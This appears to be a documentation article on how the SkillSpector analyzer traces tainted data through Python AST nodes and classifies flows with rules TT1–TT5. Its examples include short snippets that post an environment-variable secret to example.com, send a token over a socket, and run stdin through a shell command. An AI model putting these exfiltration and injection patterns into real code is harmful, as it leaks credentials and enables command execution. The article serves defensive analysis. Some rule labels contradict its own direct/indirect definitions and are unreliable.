# How SkillSpector Tracks Taint Flow from Sources to Sinks in Python Skill Code

> SkillSpector parses Python skill code to track taint flow from sources to sinks. Learn how it identifies security vulnerabilities using AST analysis and rule-based findings.

- Repository: [NVIDIA Corporation/SkillSpector](https://github.com/NVIDIA/SkillSpector)
- Tags: internals
- Published: 2026-07-07

---

**SkillSpector tracks taint flow by parsing Python skill code into an AST, marking variables as tainted when they receive data from predefined sources (like `os.getenv` or `requests.get`), and tracing those variables until they reach security-sensitive sinks (like `subprocess.run` or network calls), emitting rule-based findings such as TT2 for indirect flows or TT3–TT5 for direct source-to-sink violations.**

SkillSpector is an open-source security analyzer developed by NVIDIA that inspects AI skill code for potentially dangerous data flows. Its behavioral taint-tracking engine performs static analysis on Python files to detect when sensitive data from credential reads, file inputs, or user commands flows into risky operations. The implementation resides primarily in [`src/skillspector/nodes/analyzers/behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/src/skillspector/nodes/analyzers/behavioral_taint_tracking.py), where the analyzer orchestrates a three-phase detection pipeline that categorizes findings using specific rule IDs (TT1–TT5) based on flow characteristics.

## How Taint Tracking Works in SkillSpector

The taint-tracking analyzer processes each `.py` file in a skill through a complete AST traversal. It maintains a running set of tainted variable names and checks every call expression against dictionaries of dangerous sources and sinks. The entire flow is managed by the public `node` entry point, which skips oversized files and aggregates `AnalyzerFinding` objects that are later converted to the generic `Finding` type for reporting.

### Phase 1: Source Identification

The analyzer defines four source categories as constants: `_CREDENTIAL_SOURCES`, `_FILE_READ_SOURCES`, `_NETWORK_INPUT_SOURCES`, and `_USER_INPUT_SOURCES`. These sets contain fully-qualified call names such as `os.getenv`, `open`, `requests.get`, and `input`.

When the AST visitor encounters an assignment (`ast.Assign`), it invokes `_find_source_in_expr` to scan the right-hand side. If the expression matches a source signature, the method `_mark_targets` tags the left-hand side variables as tainted. For cases where the right-hand side references a previously tainted variable rather than a direct source call, the analyzer uses `_find_tainted_in_expr` to propagate taint forward, ensuring that chained assignments like `payload = secret` or `msg = f"{secret}"` remain tracked throughout the execution graph.

### Phase 2: Sink Detection

Security-sensitive destinations are cataloged in `_ALL_SINKS`, which includes network-output functions, exec-related APIs, and file-write methods. As the analyzer traverses `ast.Call` nodes, it resolves each call to its canonical name using `_resolve_sink_name`, which also handles dynamic imports such as `importlib.import_module(...).run`. Calls matching an entry in `_ALL_SINKS` are flagged for the subsequent flow-mapping phase.

### Phase 3: Mapping Flows from Sources to Sinks

Once sources and sinks are identified, SkillSpector maps the connections between them using two distinct strategies:

**Direct flows** are discovered via `_find_nested_sources`, which searches a sink call’s argument tree for source calls that appear nested inside the sink invocation (e.g., `requests.post(open("token").read())`). When a direct pair is found, `_pick_rule` selects the most specific rule ID—TT3, TT4, or TT5—based on the source and sink types; if no specific rule applies, the analyzer defaults to TT1.

**Indirect flows** occur when a tainted variable is assigned to intermediate containers or transformed before reaching a sink. After taint propagation, `_find_tainted_names_in_args` examines sink arguments for references to any currently tainted variable names. When tainted data reaches a sink through this indirect path, the analyzer emits a **TT2** finding to distinguish it from direct source-to-sink flows.

Each confirmed flow generates an `AnalyzerFinding` containing the rule ID, severity, code location, a human-readable message, and a `matched_text` snippet showing the problematic code.

## Code Examples: Source-to-Sink Flows

The following examples illustrate how SkillSpector classifies different taint patterns using its rule taxonomy.

### Example 1: Direct Credential Leak (TT3)

```python
import os, requests

secret = os.getenv("API_KEY")
requests.post("https://example.com/ingest", data=secret)

```

The analyzer marks `os.getenv` as a credential source and `requests.post` as a network-output sink. Because the credential flows directly into the network call, `_pick_rule` emits a **TT3** finding indicating that sensitive credentials are being transmitted over the network.

### Example 2: Indirect Flow via Container (TT2)

```python
import os, socket

token = os.getenv("TOKEN")
payload = {"auth": token}
socket.socket().sendall(str(payload).encode())

```

Here, `token` becomes tainted via the source, and `_mark_targets` records it in the taint set. Later, `_find_tainted_names_in_args` detects that `payload`—a dictionary containing the tainted variable—reaches the `sendall` sink. This triggers a **TT2** finding for an indirect flow from credential source to network output.

### Example 3: Taint Propagation Through f-Strings (TT5)

```python
import sys, subprocess

user_cmd = sys.stdin.read()
cmd = f"ls {user_cmd}"
subprocess.run(cmd, shell=True)

```

`sys.stdin.read` is classified as a user-input source. The f-string propagates taint from `user_cmd` to `cmd`, and when `subprocess.run` executes the string, the analyzer identifies an exec sink receiving external input. This generates a **TT5** finding because untrusted data flows into code execution.

## Summary

- **Source Recognition**: SkillSpector monitors four source categories (credential, file read, network input, user input) via sets like `_CREDENTIAL_SOURCES` and marks variables using `_mark_targets` when assignments contain source calls.
- **Propagation**: Taint spreads through assignments and expressions via `_find_tainted_in_expr`, tracking data through containers and string formatting operations.
- **Sink Matching**: The `_ALL_SINKS` collection defines dangerous destinations, resolved by `_resolve_sink_name` during AST traversal.
- **Flow Classification**: Direct flows (TT1, TT3-TT5) are detected by `_find_nested_sources`, while indirect flows (TT2) are caught by `_find_tainted_names_in_args`.
- **Reporting**: Findings are emitted as `AnalyzerFinding` objects in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py) and converted to `Finding` objects by [`static_runner.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_runner.py) for final output.

## Frequently Asked Questions

### What is taint tracking in SkillSpector?

Taint tracking in SkillSpector is a static analysis technique that treats data originating from sensitive sources (such as environment variables or user input) as "tainted." The analyzer follows these variables through the AST—across assignments, function calls, and string operations—to determine if they reach security-critical sinks (like `exec` or network transmissions) without proper sanitization.

### How does SkillSpector distinguish between direct and indirect taint flows?

SkillSpector uses two different detection methods. **Direct flows** occur when a source call appears nested directly inside a sink call’s arguments, detected by `_find_nested_sources` and classified with rules TT1 or TT3–TT5. **Indirect flows** happen when a tainted variable is stored in an intermediate variable or container before reaching a sink; these are identified by `_find_tainted_names_in_args` and tagged with rule **TT2**.

### What types of sources and sinks does the analyzer detect?

According to the source code in [`behavioral_taint_tracking.py`](https://github.com/NVIDIA/SkillSpector/blob/main/behavioral_taint_tracking.py), the analyzer recognizes **credential sources** (e.g., `os.getenv`), **file read sources** (e.g., `open`), **network input sources** (e.g., `requests.get`), and **user input sources** (e.g., `input`). Sinks include network outputs, file write operations, and execution functions like `subprocess.run` or `eval`.

### How are taint-tracking findings reported in the SkillSpector pipeline?

When the analyzer confirms a flow, it creates an `AnalyzerFinding` containing the rule ID, severity, line number, and a code snippet. The `node` entry point aggregates these findings across all Python files in the skill. Subsequently, [`static_runner.py`](https://github.com/NVIDIA/SkillSpector/blob/main/static_runner.py) transforms the `AnalyzerFinding` objects into the generic `Finding` type used by the broader SkillSpector reporting infrastructure.